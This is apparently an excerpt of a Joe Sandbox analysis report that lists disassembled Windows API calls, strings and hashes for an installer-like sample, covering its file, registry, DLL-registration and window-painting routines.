                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429A95,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                      • 8Lh, xrefs: 00402473
                                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: 8Lh$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                      • API String ID: 1033533793-2929593405
                                                                                                                                                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                      • String ID:
